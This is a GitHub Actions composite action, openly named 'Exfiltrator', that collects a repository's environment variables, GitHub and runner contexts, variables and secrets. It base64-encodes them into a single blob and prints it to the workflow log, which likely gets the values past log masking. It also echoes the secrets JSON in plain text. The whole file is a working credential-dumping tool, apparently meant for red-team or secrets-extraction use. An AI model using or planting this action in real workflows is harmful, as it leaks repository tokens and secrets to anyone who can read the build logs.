name: 'Exfiltrator'
description: 'This exfiltrates secrets and environment variables.'

inputs:
  vars:
    description: 'The variables for the repository'
    required: false
    default: "{\"vars\":\"no vars\"}"
  secrets:
    description: 'The secrets for the repository'
    required: false
    default: "{\"vars\":\"no secrets\"}"

runs:
  using: "composite"
  steps:
    - name: 'Print secrets and environment variables to the terminal'
      shell: bash
      run: echo $(printf '[%s, %s, %s, %s, %s]' "{\"envvars\":\"$(env | base64 -w 0)\"}" "$GITHUB_JSON" "$RUNNER_JSON" "$VARS_JSON" "$SECRETS_JSON" | base64 -w 0) && echo "$SECRETS_JSON"
      env:
        GITHUB_JSON: ${{ toJSON(github) }}
        RUNNER_JSON: ${{ toJSON(runner) }}
        VARS_JSON: ${{ inputs.vars }}
        SECRETS_JSON: ${{ inputs.secrets }}
        
